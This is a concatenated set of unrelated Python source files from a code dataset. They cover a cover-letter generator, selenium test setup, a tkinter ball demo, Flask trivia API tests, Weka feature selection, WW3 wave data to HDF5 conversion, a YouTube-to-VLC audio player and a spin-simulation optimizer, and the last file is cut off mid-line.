exercise of both my communication skills and leadership, and provided me a global perspective.\"\nsoftware = \"I feel comfortable working with Microsoft Office applications, such as Excel and Power Point, and analytical software, such as SPSS, SYSTAT and R.\"\nmultitasking = \"I also developed the ability to multitask through balancing my schedule of different research projects, leadership position, and coursework.\"\n\n\nending_body = f\"I feel strongly that my analytical and communication skills, consumer psychology background, and past research experience will make me an excellent fit for the role of Marketing Intern. My global cultural perspective can also contribute to this position. I would welcome the opportunity to discuss the position in further interview. Thank you for your time and consideration.\"\n\n## Output\nprint(\"Dear HR Manager:\")\nprint(\"\")\nprint(intro_p)\nprint(\"\")\n\n\n### Conditional selection of key words from the job description\njob_description = list(job_dict[\"description\"])\n\n\nif \"analytical\" or \"research\" or \"quantitative\" or \"market research\" in job_description:\n print(analytical_research)\n print(\"\")\n\nif \"communication\" or \"verbal\" or \"people\" in job_description:\n skill_body = communication\n# else:\n# return skill_body\n\nif \"global\" or \"leadership\" in job_description:\n skill_body = skill_body + global_leadership\nelse:\n skill_body = skill_body\n\nif \"software\" or \"Microsoft Office\" or \"Excel\" or \"PowerPoint\" or \"Word\" or \"SPSS\" or \"R\" in job_description:\n skill_body = skill_body + software\nelse:\n skill_body = skill_body\n\nif \"multitask\" or \"organizational\" or \"time-management\" or \"time management\" in job_description:\n skill_body = skill_body + multitasking\nelse:\n skill_body = skill_body\n\n\n\n# if \"market\" or \"marketing\" in job_requirments\n#\n#\nprint(\"SKILL BODY\", skill_body)\n\nprint(\"\")\nprint(\"ENDING BODY\", ending_body)\n## ENDING\nend = f\"\"\"\nSincerely,\n{user_name}\n\"\"\"\nprint(\"FINAL\", end)\n\n\n## Writing the output to a word document\n### Attributed from: https://python-docx.readthedocs.io/en/latest/\ndoc = docx.Document()\n# header = doc.add_heading(user_name, 0)\nheader = doc.add_heading(user_name, 3)\nheader_contact = doc.add_heading(f\"{user_address} | {user_phone} | {user_phone}\", 8)\nheader.alignment = WD_ALIGN_PARAGRAPH.CENTER\nheader_contact.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\n# header_style_font = header_style.font\n# header_style_font.name = 'Times New Roman'\n# font.header_style_font = Pt(8)\n# header_font = header.font\n# header_font.size = Pt(10)\n# header_font.name = 'Times New Roman'\n# header_font.alignment = WD_ALIGN_PARAGRAPH.CENTER\n\np1 = doc.add_paragraph(start)\np2 = doc.add_paragraph(\"Dear HR Manager:\")\np3 = doc.add_paragraph(intro_p)\np4 = doc.add_paragraph(analytical_research)\np5 = doc.add_paragraph(skill_body)\np6 = doc.add_paragraph(ending_body)\np7 = doc.add_paragraph(end)\nstyle = doc.styles['Normal']\nfont = style.font\nfont.name = 'Times New Roman'\nfont.size = Pt(10)\ndoc.save(f'{company_name}-cover letter.docx')\n","sub_path":"template.py","file_name":"template.py","file_ext":"py","file_size_in_byte":7392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"414995331","text":"import allure\nfrom selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom webdriver_manager.firefox import GeckoDriverManager\n\nfrom BehaveBDDWithPageObjects.Utilities import configReader\n\n\ndef before_scenario(context, driver):\n if configReader.readConfig(\"basic info\",\"browser\") == \"chrome\":\n context.driver = webdriver.Chrome(executable_path=ChromeDriverManager().install())\n context.driver.maximize_window()\n context.driver.implicitly_wait(10)\n if configReader.readConfig(\"basic info\",\"browser\") == \"firefox\":\n context.driver = webdriver.Firefox(executable_path=GeckoDriverManager().install())\n context.driver.maximize_window()\n context.driver.implicitly_wait(10)\n\n\ndef after_scenario(context, driver):\n context.driver.quit()\n\n\ndef after_step(context, step):\n print()\n if step.status == 'failed':\n allure.attach(context.driver.get_screenshot_as_png(), name='screenshot',\n attachment_type=allure.attachment_type.PNG)\n","sub_path":"BehaveBDDWithPageObjects/features/environment.py","file_name":"environment.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"407186083","text":"# The ball should bounce between the top and bottom edges when run\nfrom tkinter import *\nimport random\nimport time\n\n# Created a window\ntk = Tk()\n\n# Adding a title to our window\ntk.title(\"Game\")\n\n# The window is a fixed size, it cannot be changed\ntk.resizable(0, 0)\n\n# Places the window on top of our other windows\ntk.wm_attributes(\"-topmost\", 1)\n\n# Creates the canvas for our game\n# Passing in parameters: window, dimensions, no border\ncanvas = Canvas(tk, width=500, height=400, bd=0, highlightthickness=0)\n\n# Setting the canvas size to the dimensions above\ncanvas.pack()\n\n# Creates the window with our canvas\ntk.update()\n\n# Let's make our ball\nclass Ball:\n\n # A function that \"initializes\" the ball; it creates the ball\n def __init__(self, canvas, color):\n # Making the bckgrnd the canvas\n self.canvas = canvas\n # Creates the shape and color of the ball\n # (10,10) are the x,y coords for the top-left of the ball\n # (25,25) are the x,y coords for the bot-right of the ball\n # Our ball is 15 x 15\n self.id = canvas.create_oval(10, 10, 25, 25, fill=color)\n # Move the ball to the middle of the canvas: (245,100)\n self.canvas.move(self.id, 245, 100)\n # Setting the ball's initial movement with x & y\n self.x = 0\n self.y = -1\n # We do this so the ball can \"remember\" the height of the canvas\n self.canvas_height = self.canvas.winfo_height()\n \n # We've come back to this again\n def draw(self):\n # These lines below will make the ball bounce when it reaches the edges\n self.canvas.move(self.id, self.x, self.y)\n pos = self.canvas.coords(self.id)\n if pos[1] <= 0:\n self.y = 1\n if pos[3] >= self.canvas_height:\n self.y = -1\n\n# Create the ball, you can change the color \nball = Ball(canvas, 'red')\n\n# Tells tkinter, our window, to update every 1/100 second forver\n# (or at least until we close the window)\nwhile 1:\n # redraw the ball\n ball.draw() # Now, when you run the game, the ball should move up\n tk.update_idletasks()\n tk.update()\n time.sleep(0.01)\n\n","sub_path":"camp_materials/pong/bounce4.py","file_name":"bounce4.py","file_ext":"py","file_size_in_byte":2140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"12244996","text":"import os\nimport unittest\nimport json\nfrom flask_sqlalchemy import SQLAlchemy\nfrom flaskr import create_app\nfrom models import setup_db, Question, Category\n\n\nclass TriviaTestCase(unittest.TestCase):\n \"\"\"This class represents the trivia test case\"\"\"\n\n def setUp(self):\n \"\"\"Define test variables and initialize app.\"\"\"\n self.app = create_app()\n self.client = self.app.test_client\n self.database_name = \"trivia_test\"\n self.database_path = \"postgres://{}/{}\".format('localhost:5432', self.database_name)\n setup_db(self.app, self.database_path)\n\n # binds the app to the current context\n with self.app.app_context():\n self.db = SQLAlchemy()\n self.db.init_app(self.app)\n # create all tables\n self.db.create_all()\n\n def tearDown(self):\n \"\"\"Executed after reach test\"\"\"\n pass\n\n # Create error handlers for all expected errors including\n # 400 Bad Request Error.\n # 404 Not Found,\n # Unprocessable Entity 422 x status code occurs when a request is well-formed, however,\n # due to semantic errors it is unable to be processed.\n # 500 Internal Server Error\n\n # Test Functionality\n\n # Test List of Categories\n def test_get_categories(self):\n res = self.client().get('/categories')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['categories'])\n\n # Test List of Questions\n def test_get_questions(self):\n res = self.client().get('/questions')\n data = json.loads(res.data)\n self.assertEqual(res.status_code, 200)\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], '')\n self.assertTrue(data['questions'])\n self.assertTrue(data['categories'])\n\n # Test Pagination\n def test_verify_pagination(self):\n res = self.client().get('/questions?page=1')\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n self.assertTrue(data['total_questions'])\n self.assertEqual(data['current_category'], '')\n self.assertTrue(data['questions'])\n self.assertTrue(data['categories'])\n if data['total_questions'] > 10:\n self.assertEqual(len(data['questions']), 10)\n\n # Test add question\n def test_add_question(self):\n res = self.client().post('/questions/add',\n json={'question': 'Men who put first foot at the moon',\n 'answer': 'Neil Amstrong', 'category': 4, 'difficulty': 4})\n\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n self.assertEqual(data['question'],'Men who put first foot at the moon')\n self.assertEqual(data['answer'],'Neil Amstrong')\n self.assertEqual(data['category'],4)\n self.assertEqual(data['difficulty'],4)\n\n\n # Test play trivia\n def test_play_game(self):\n res = self.client().post('/play',\n json={'quiz_category': {'id': '1', 'type': 'Science'}, 'previous_questions': []})\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n self.assertEqual(data['success'], True)\n self.assertTrue(data['question'])\n self.assertTrue(data['question']['category'],1)\n\n # Test delete element by id\n\n def test_delete_question_by_id(self):\n res = self.client().delete('/questions/2')\n data = json.loads(res.data)\n question = Question.query.filter(Question.id == 2).one_or_none()\n self.assertEqual(res.status_code, 200)\n self.assertEqual(data['success'], True)\n self.assertEqual(question, None)\n self.assertEqual(data['id'], 2)\n\n\n def test_search_by_term(self):\n res = self.client().post('/questions',\n json={'searchTerm': 'What'})\n self.assertEqual(res.status_code, 200)\n data = json.loads(res.data)\n self.assertEqual(data['success'], True)\n\n\n # 404 NOT FOUND: URL wrote incorrectly.\n\n def test_verify_404_categories(self):\n res = self.client().get('/categori')\n print(res)\n self.assertEqual(res.status_code, 404)\n\n def test_verify_404_questions(self):\n res = self.client().get('/questio')\n self.assertEqual(res.status_code, 404)\n\n def test_verify_404_delete_question_by_id(self):\n res = self.client().delete('/questio/1')\n self.assertEqual(res.status_code, 404)\n\n def test_verify_404_question_by_category(self):\n res = self.client().get('/categories/1/quesons')\n self.assertEqual(res.status_code, 404)\n\n def test_verify_404_add_question(self):\n res = self.client().post('/add')\n self.assertEqual(res.status_code, 404)\n\n def test_404_play_game(self):\n res = self.client().post('/play/', json={'quiz_category': 1, 'previous_questions': []})\n self.assertEqual(res.status_code, 404)\n\n\n # 400 Bad Request: The browser (or proxy) sent a request that this server could not understand.\n\n # Arg quest incorrect\n def test_verify_400_questions(self):\n res = self.client().get('/questions', json={'question': 'question??'})\n self.assertEqual(res.status_code, 400)\n\n # Arg cat incorrect\n def test_verify_400_categories(self):\n res = self.client().get('/categories', json={'cat': 1})\n self.assertEqual(res.status_code, 400)\n \n\n # Args required, incorrect\n def test_verify_400_add_question(self):\n res = self.client().post('/questions/add')\n self.assertEqual(res.status_code, 400)\n\n\n # 422 Semantic Incorrect\n\n # Test Delete, Id doesnt exist\n def test_verify_422_delete_question_by_id(self):\n res = self.client().delete('/questions/1')\n self.assertEqual(res.status_code, 422)\n\n # Test Empty answer\n def test_verify_422_add_question(self):\n res = self.client().post('/questions/add',\n json={'question': 'Men who put first foot at the moon',\n 'answer': '', 'category': 4, 'difficulty': 4})\n self.assertEqual(res.status_code, 422)\n\n # 500\n\n # Bad args type (quiz_category) should be a dict\n def test_error_500_play_game(self):\n res = self.client().post('/play',\n json={'quiz_category': 1,\n 'previous_questions': None})\n self.assertEqual(res.status_code, 500)\n\n\n\"\"\"\n TODO\n Write at least one test for each test for successful operation and for expected errors.\n \"\"\"\n\n# Make the tests conveniently executable\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"projects/02_trivia_api/starter/backend/test_flaskr.py","file_name":"test_flaskr.py","file_ext":"py","file_size_in_byte":6748,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"499583972","text":"# print all odd Numbers in range\n# энэ арга нь эхлэхээс төгсгөл хүртэлх бүх \n# сондгой тоонуудыг нэг шугам дотор харуулна\n\n''' \nstart, end = 1, 15\n \nfor num in range(start, end + 1): \n if num % 2 != 0: \n print(num, end = \" \")\n'''\n\n# n ээс m тоо хүртэлх сондгой бүх тоонуудыг хэвлэ\n\nn, m = [int(x) for x in input().split()]\nfor i in range(n, m + 1):\n if i % 2 == 1:\n print(i)","sub_path":"Дасгалууд/d8.py","file_name":"d8.py","file_ext":"py","file_size_in_byte":516,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"253343547","text":"\"\"\"\r\nModule containing functions responsible for selecting an informative subset of features, to obtain the best accuracy.\r\n\"\"\"\r\nimport os\r\nimport pandas as pd\r\nimport subprocess\r\nimport tempfile\r\nfrom markets.dataset import TweetsDataSet\r\nfrom markets.tweets_features_extraction import remark_features\r\n\r\nASSOCIATION_MODEL_FILE = os.path.join(os.path.dirname(__file__), \"assoc_model.pickle\")\r\npd.set_option('display.width', 1500)\r\nWEKA_JAR_FILE = os.path.join(os.path.dirname(__file__), \"weka-3-8-2\", \"weka.jar\")\r\n\r\n\r\ndef read_features_from_file(filename):\r\n return [line.strip() for line in open(filename, 'r')]\r\n\r\n\r\ndef select_features(df, filename):\r\n if os.path.isfile(filename):\r\n features = read_features_from_file(filename)\r\n else:\r\n features = get_features_from_weka(df)\r\n save_selected_features(features, filename)\r\n\r\n main_df = filter_features(df, features)\r\n return main_df\r\n\r\n\r\ndef save_selected_features(list_of_features, filename):\r\n with open(filename, \"w\") as f:\r\n f.write(\"\\n\".join(list_of_features))\r\n\r\n\r\ndef filter_features(dataset, features_to_leave, with_dropping=True):\r\n sifted_dataset = TweetsDataSet(dataset.get_no_features_df())\r\n remark_features(sifted_dataset, features_to_leave, with_dropping)\r\n return sifted_dataset\r\n\r\n\r\ndef save_features_with_target_to_file(df, filename):\r\n df = df.drop(columns=[\"Text\", \"Tweet_sentiment\"])\r\n df.to_csv(filename, index=False)\r\n\r\n\r\ndef run_weka_with_file(temp_filename):\r\n command = ['java', '-classpath', WEKA_JAR_FILE,\r\n 'weka.attributeSelection.WrapperSubsetEval',\r\n '-T', '0.5',\r\n '-B', 'weka.classifiers.bayes.NaiveBayesMultinomial',\r\n '-s', 'weka.attributeSelection.BestFirst',\r\n '-i', temp_filename]\r\n stdoutdata = subprocess.getoutput(command)\r\n found_features = False\r\n features = []\r\n for l in stdoutdata.split(\"\\n\"):\r\n if found_features:\r\n features.append(l.strip())\r\n if l.startswith(\"Selected attributes:\"):\r\n found_features = True\r\n features = [f for f in features if f] # make sure no empty line added\r\n if not features:\r\n print(stdoutdata)\r\n raise Exception(\"Problem while doing feature selection with Weka library.\")\r\n\r\n return features\r\n\r\n\r\ndef get_features_from_weka(df):\r\n with tempfile.NamedTemporaryFile(delete=False, suffix=\".csv\") as fp:\r\n save_features_with_target_to_file(df, fp.name)\r\n features = run_weka_with_file(fp.name)\r\n return features\r\n","sub_path":"markets/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"85897347","text":"import numpy as np\nimport h5py, glob, os\nimport read_field_ww3 as rfww3\nimport wis_h5_out as wh5\n#from write_atl_att import write_top_level_att\n#from write_atl_att import write_field_attr\n\nclass ww3:\n def __init__(self,yearmon,uname):\n self.yearmon = yearmon\n self.uname = uname\n self.varname = {'wavhs':'hs','wavtp':'fp','wavdir':'dir','wavspr':'spr','wavhs_wndsea':'phs_sea','wavtp_wndsea':'ptp_sea','wavdir_wndsea':'pdi_sea','wavhs_swell1':'phs_sw1','wavtp_swell1':'ptp_sw1','wavdir_swell1':'pdi_sw1','wavhs_swell2':'phs_sw2','wavtp_swell2':'ptp_sw2','wavdir_swell2':'pdi_sw2','wnd_u':'wnd','wnd_v':'wnd'}\n h5fn = 'Wis_test_field.h5'\n h5file = h5py.File(h5fn,'w')\n # write_top_level_att(h5fname)\n for key in self.varname.keys():\n tt, header, dataf = rfww3.read_fields_ww3('./',self.varname[key],key)\n if 'time' not in h5file.keys():\n self.tt = tt\n self.time2date()\n dataset = h5file.create_dataset('time',(self.pytime.shape),dtype=('f8'))\n dataset[...] = self.pytime\n dataset = h5file.create_dataset('datetime',(self.dattime.shape),dtype=('i4'))\n dataset[...] = self.dattime\n h5file.attrs['longitude'] = header['lonw'], header['lone']\n h5file.attrs['latitude'] = header['lats'], header['latn']\n h5file.attrs['nlon'] = header['ilon']\n h5file.attrs['nlat'] = header['jlat']\n \n dataset = h5file.create_dataset(key,(dataf.shape),dtype=('i4'))\n dataset[...] = dataf\n\n wh5.create_field_var_att(h5file,self.varname.keys())\n h5file.close()\n \n \n def time2date(self):\n import datetime as DT\n self.pytime = np.zeros((self.tt.shape[0],1))\n self.dattime = np.zeros((self.tt.shape[0],6))\n for ii in range(self.tt.shape[0]):\n stdate = str(self.tt[ii][0])\n sttime = str(self.tt[ii][1])\n if len(sttime) == 5:\n dtime = DT.datetime(int(stdate[:4]),int(stdate[4:6]),int(stdate[6:8]),int(sttime[:1]),int(sttime[1:3]),int(sttime[3:5]))\n elif len(sttime) == 1:\n dtime = DT.datetime(int(stdate[:4]),int(stdate[4:6]),int(stdate[6:8]),0,0,0)\n else:\n dtime = DT.datetime(int(stdate[:4]),int(stdate[4:6]),int(stdate[6:8]),int(sttime[:2]),int(sttime[2:4]),int(sttime[4:6]))\n self.pytime[ii] = DT.datetime.toordinal(dtime) + dtime.hour/24. + dtime.minute/(24.*60.) + dtime.second/(3600.*24.)\n self.dattime[ii,:] = dtime.year,dtime.month,dtime.day,dtime.hour,dtime.minute,dtime.second\n\n\n","sub_path":"test_save_point_loc/create_field_hdf5.py","file_name":"create_field_hdf5.py","file_ext":"py","file_size_in_byte":2696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"443344225","text":"import vlc\nimport pafy\nfrom youtubesearchpython import VideosSearch\nimport random\n\n'''\n~~Code resources~~\nYoutube URL generation library docs\nhttps://pypi.org/project/youtube-search-python/\n\nPlaying Youtube videos usin VLC\nhttps://stackoverflow.com/questions/49354232/how-to-stream-audio-from-a-youtube-url-in-python-without-download\nhttps://stackoverflow.com/questions/56611337/python-vlc-doesnt-plays-and-response-with-the-youtube-video-link\n'''\n\ndef generateURLYouTubeSearch(searchQuery):\n search = VideosSearch(searchQuery + ' music', limit=20)\n searchIndex = random.randint(0, 19)\n url = search.result()['result'][searchIndex]['link']\n return url\n\n'''\nrequires libvlc\n'''\ndef playYouTubeAudio(url, player):\n video = pafy.new(url)\n best = video.getbest()\n playurl = best.url\n\n #To play with video remove no-video\n Media = ins.media_new(playurl, \":no-video\")\n Media.get_mrl()\n player.set_media(Media)\n player.play()\n\n\n#Only runs when you run this file.\nif __name__ == '__main__':\n url = generateURLYouTubeSearch(input(\"insert a search: \"))\n\n ins = vlc.Instance()\n mediaPlayer = ins.media_player_new()\n playYouTubeAudio(url, mediaPlayer)\n\n command = ''\n while(command != 'yes'):\n command = input(\"Stop Playing: \")\n mediaPlayer.stop()","sub_path":"sam/MusicPlayer.py","file_name":"MusicPlayer.py","file_ext":"py","file_size_in_byte":1299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"23156844","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport getopt\nimport numpy as np\nfrom scipy.optimize import minimize\n\nfrom ROOT import gSystem\n\ngSystem.Load('/data1/cmswank/spin-sim-xliu/runShared.so') #the fancy stuff broke after c libraries updated. \n\nfrom ROOT import Run, RunParameters\n\ndef create_run(run_id, opts):\n run = Run(run_id)\n if Run.FileExists(run.filename):\n print(\"%s already exists\" % (run.filename, ))\n if '-c' not in opts:\n raise ValueError('Need -c parameter to continue existing run')\n if '-p' in opts:\n print(\"W: ignoring parameter file %s\" % (opts['-p'],))\n if run.loadRun() != 0:\n raise ValueError(\"Could not load run %d\" % (run_id,))\n print(\"%d entries found\" % (run.nCurrent,))\n if '-n' in opts:\n n = int(opts['-n'])\n if n <= run.nCurrent:\n raise ValueError('use -n to continue to a number larger than %d' % (run.nCurrent,))\n run.parameters.nEntries = n\n print(\"continuing to %d\" % (run.parameters.nEntries,))\n else:\n if '-c' in opts:\n raise ValueError('-c fails. Nothing to continue, or %s not found' % (run.filename,))\n if '-p' not in opts:\n raise ValueError('need to specify parameter file with -p')\n run.parameters.ParseParameterFile(opts['-p'])\n if '-n' in opts:\n n = int(opts['-n'])\n print('-n used. Overriding nEntries %d -> %d' % (run.parameters.nEntries, n))\n run.parameters.nEntries = n\n run.nCurrent = 0\n run.parameters.PrintParameters()\n if '--numerical' in opts:\n run.parameters.numerical_method = int(opts['--numerical'])\n run.InitializeRun()\n run.InitializeTFile()\n return run\n\n################################## Optimization Loop !!!!!!!!!!\n\ndef single_loop(x1,run):\n \n print(\"Starting run %d for x1 = %f...\" % (run.runID,x1[0]))\n Sxn=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Syn=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Szn=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Sx3=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Sy3=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n Sz3=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n tsim=np.empty([run.parameters.nEntries//2,run.parameters.nBins+1]);\n run.nCurrent=0;\n\n\n while run.nCurrent < run.parameters.nEntries:\n rn=run.nCurrent\n rnf=run.nCurrent*1.0000\n norsf=run.parameters.nEntries*1.0000;\n if 1==1: #2.9817*(1+1E-2*(x1[0]-1.0)) < 3.1 and 2.9817*(1+1E-2*(x1[0]-1.0)) > 2.9 : #careful. \n\n \n #B1=0.000250021223525*(1+5E-5*rn//2)\n #print \"Bz1 = \"+str(B1)+\",\"\n #run.EraseFieldFormula();\n #run.parameters.field_assignment(\"BzAdd\",str(B1))\n #run.parameters.Pulseparam[1]=rn//2+1;\n ##E field Variation\n #if rn%2==0:\n #run.parameters.E0[0]=-run.parameters.E0[0];\n #run.parameters.E0[0]=0.0;\n \n\n #run.parameters.E0[0]=0.; \n run.parameters.simType=rn%2\n \n if rn%2==0:\n run.parameters.seed=82*(rn+1)\n #run.parameters.seed=82*(rn+1) \n #4.02497057364e-05; best critically dressed for 5.2 uT. 103 Hz. 8 significant digits.\n #Best for robust dressing at 5.2 uT 200 Hz mod, B1=4.205e-5; modulation amplitude = 3.497!. \n #Best for robust dressing at 5.2 uT 300 Hz mod, B1=4.42958e-5; modulation amplitude = 3.32973!. \n #best for robust dresssing at 5.2 uT 550Hz mod, B1=5.3491388e-05; mod amp= 2.591036\n\n #best for rcd 5.2 uT 200Hz mod CONSTANT POWER amp= 0.074262070170000, B1=5.22583821E-5\n #8.2968e-05 3225.4323 -2708.6339 0.0011028 0.0036526\n #rcd const power 0.05 opt 8.9866e-05 2897.1981 -2414.8694 0.0012682 0.0034519\n #rcd const power 0.1 opt 8.4395e-05 2966.3542 -2534.4201 0.0012507 0.0034669\n #The reason const power doesn't work is that it isn't floquet in the previous method,\n #The new method optimizes B1, omega, and fm t1 and t2, but solves for wrf_amp so that it is floquet. \n #hopefully this means it can find a solution at 0.005 and if its good enough it will work for all time. \n #Hopefully. \n #at this moment the phase go to 4*Pi for the fm to go one cycle. \n #it didn't really find a solution. uh ohh. this might not work. \n #IT DIDNT WORK\n #2, 5.992436587477e+03, 0.0, 1.030520983610e+02, -7.836933948788e+02, 1.084752848683e-03, 6.075986503570e-03, 1.570796327;\n #BzAdd = \"3.668263691837e-05\";\n #IT FOUND CRITICAL DRESSING!!!!! ugg..\n #not a terrible place to start from?\n\n\n wm=2*np.pi*run.parameters.SDparam[3];\n #B1=8.463e-05*(1+1E-2*(x1[0]-1.0));#5.3491388e-05#4.205e-5#5.3491388E-5#4.205e-5#5.347e-05*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));#4.02444353976e-05*(1+1E-4*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));#0.000250021223525*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))#\n #print \"Bz1 = \"+str(B1)+\"\\n\"\n #run.EraseFieldFormula();\n #run.parameters.field_assignment(\"BzAdd\",str(B1))\n \n #SDparam[4]=2.9817 is for amplitude RCD\n #run.parameters.SDparam[4]=2.9817*(1+1E-2*(x1[0]-1.0));#3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n #run.parameters.SDparam[1]=2960.3236*(1+1E-2*(x1[1]-1.0));#This is wrf or b 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n #we fina\n\n\n B1=3.668263691837e-05*(1+1E-2*(x1[0]-1.0));\n run.EraseFieldFormula();\n run.parameters.field_assignment(\"BzAdd\",str(B1))\n\n run.parameters.SDparam[1]=5.992436587477e+03*(1+1E-2*(x1[1]-1.0));#This is wrf or b 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n\n run.parameters.SDparam[3]=1.030520983610e+02*(1+1E-2*(x1[2]-1.0)); #mo\n run.parameters.totalTime=1./(run.parameters.SDparam[3]);\n if run.parameters.SDparam[3] > 600:\n run.parameters.SDparam[3] = 600;\n #run.parameters.SDparam[4]=-2527.5024*(1+1E-2*(x1[2]-1.0));#This is wrf_amp or c 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n run.parameters.SDparam[5]=0.7500000000e-3*(1+1E-2*(x1[3]-1.0));#this is t1 (transition time) 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n run.parameters.SDparam[6]=0.4250000000e-2*(1+1E-2*(x1[4]-1.0));#this is t2 (transition time 2) 3.57E-5/B1*3.497 #*(1+1E-3*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2));\n \n if run.parameters.SDparam[5]>0.975*1./(run.parameters.SDparam[3]):\n run.parameters.SDparam[5]=0.975*1./(run.parameters.SDparam[3]);\n print(str(run.parameters.SDparam[5])+\"\\n\")\n if run.parameters.SDparam[5]<0.025*1./(run.parameters.SDparam[3]):\n run.parameters.SDparam[5]=0.025*1./(run.parameters.SDparam[3]);\n print(str(run.parameters.SDparam[5])+\"\\n\")\n \n if run.parameters.SDparam[6]>0.975*1./(run.parameters.SDparam[3]):\n run.parameters.SDparam[6]=0.975*1./(run.parameters.SDparam[3]);\n print(str(run.parameters.SDparam[6])+\"\\n\")\n if run.parameters.SDparam[6]<0.025*1./(run.parameters.SDparam[3]):\n run.parameters.SDparam[6]=0.025*1./(run.parameters.SDparam[3]);\n print(str(run.parameters.SDparam[6])+\"\\n\")\n \n\n\n #print \"x1 = \"+str(run.parameters.SDparam[4])+\"\\n\"\n #print \"Mod amp = \"+str(run.parameters.SDparam[4]*B1/3.57E-5)+\"\\n\"\n #6 7 Bz1 = 4.1915874e-05\n\n #\n #run.parameters.Pulseparam[3]=1.245#*(1+.05*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))\n #run.parameters.Pulseparam[2]=0.708#*(1+0.1*(rn/2-run.parameters.nEntries/4)/(run.parameters.nEntries/2))#7 is noise rng seed. \n #Neutrons:\n #3845.309408, 6283.18530718\n #\n #phase=0;#np.pi/4;#np.pi/2;#np.pi/4.0;\n #phi=np.pi/8;\n\n run.parameters.spinSettings[2]=1.\n run.parameters.spinSettings[1]=0.;#np.sin(phi+phase)#+phase/2.0)\n run.parameters.spinSettings[0]=0.#np.cos(phi+phase)#+phase/2.0)\n #run.parameters.edm=1E-23 this is e meters. (ugghhh)\n #run.parameters.edm=0\n #run.parameters.speed=5\n #if rn%4==0:\n #run.parameters.SDparam[2]=np.pi*(rnf/norsf)\n #run.parameters.SDparam[2]=0.0;\n \n #run.parameters.Pulseparam[7]=82*(rn+1) #7 is noise rng seed.\n #print \"B1phi = \" +str(run.parameters.SDparam[2])+\"\\n\"\n #run.parameters.Pulseparam[1]=(rn//2+2) \n #offset in another cell, \n \n else:\n #3He:\n run.parameters.spinSettings[2]=1.\n run.parameters.spinSettings[1]=0.;#np.sin(phi+phase)#+phase/2.0)\n run.parameters.spinSettings[0]=0.#np.cos(phi+phase)#+phase/2.0)\n #run.parameters.edm=0\n #run.parameters.E\n #print \"phi = \" +str(run.parameters.SDparam[2])+\"\\n\"\n #7 is noise rng seed. \n #run.parameters.Pulseparam[7]=82*(rn+1) #7 is noise rng seed. \n #678742112 #seed is trajectory rng. \n run.ReloadParameters();\n \n ret = run.runNeutronQuiet();\n\n\n\n if ret == 0:\n ii=0;#run.parameters.nBins-99\n if rn%2==0:\n #Sxn=run.neutronData.spinx[run.parameters.nBins];\n #Syn=run.neutronData.spiny[run.parameters.nBins];\n #Szn=run.neutronData.spinz[run.parameters.nBins]; \n for i in range(0,run.parameters.nBins+1,1):\n Sxn[rn//2][ii]=run.neutronData.spinx[i];\n Syn[rn//2][ii]=run.neutronData.spiny[i];\n Szn[rn//2][ii]=run.neutronData.spinz[i];\n tsim[rn//2][ii]=run.neutronData.time[i];\n #print run.neutronData.spinz[i];\n ii=ii+1;\n else:\n #Sx3=run.neutronData.spinx[run.parameters.nBins];\n #Sy3=run.neutronData.spiny[run.parameters.nBins];\n #Sz3=run.neutronData.spinz[run.parameters.nBins];\n for i in range(0,run.parameters.nBins+1, 1):\n Sx3[rn//2][ii]=run.neutronData.spinx[i];\n Sy3[rn//2][ii]=run.neutronData.spiny[i];\n Sz3[rn//2][ii]=run.neutronData.spinz[i];\n ii=ii+1;\n \n sys.stdout.write(str(rn)+' ')\n sys.stdout.flush()\n \n else:\n print(\"discarded one neutron\")\n else:\n run.nCurrent=run.parameters.nEntries;\n #Done with the calculation, lets do the math to return the value for dumb ol' python.\n \n #print \"Sx1 \"+str(Sx[0][0])+\" Sx2 \"+str(Sx[1][0])+\"\\n\";\n #Sxpp=np.mean(Sx,axis=0);\n #print \"check if sum of Sx at t = 0?\"+str(Sxpp[0])+\"\\n\";\n if 1==1:#(2.9817*(1+1E-2*(x1[0]-1.0)) < 